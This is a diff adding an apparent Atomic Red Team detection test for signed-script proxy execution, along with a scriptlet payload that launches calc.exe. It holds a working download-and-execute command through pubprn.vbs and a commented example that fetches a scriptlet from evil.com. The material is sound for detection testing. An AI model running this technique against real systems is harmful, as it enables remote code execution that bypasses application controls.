diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml
new file mode 100644
index 00000000..8e0d77f4
--- /dev/null
+++ b/atomics/T1216/T1216.yaml
@@ -0,0 +1,22 @@
+---
+attack_technique: T1216
+display_name: Signed Script Proxy Execution
+
+atomic_tests:
+- name: PubPrn.vbs Signed Script Bypass
+  description: |
+    Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    remote_payload:
+      description: A remote payload to execute using PubPrn.vbs.
+      type: Url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
+
+  executor:
+    name: command_prompt
+    command: |
+      cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
diff --git a/atomics/T1216/payloads/T1216.sct b/atomics/T1216/payloads/T1216.sct
new file mode 100644
index 00000000..b08f92ef
--- /dev/null
+++ b/atomics/T1216/payloads/T1216.sct
@@ -0,0 +1,23 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration 
+    progid="PoC"
+    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+	<!-- cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:http://evil.com/payload.sct" -->
+
+	<!-- .sct files when downloaded, are executed from a path like this -->
+	<!-- Please Note, file extenstion does not matter -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+  	<!-- You can either execute locally, or from a url -->
+	<script language="JScript">
+		<![CDATA[
+	    		// calc.exe should launch, this could be any arbitrary code.
+      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
+	
+		]]>
+</script>
+</registration>
+</scriptlet>
\ No newline at end of file